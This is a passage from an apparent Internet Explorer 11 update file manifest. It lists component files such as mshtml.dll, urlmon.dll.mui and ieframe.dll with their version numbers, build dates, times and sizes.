11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 22:36| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:24| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:48| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 20:47| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:12| 785,408 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:22| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 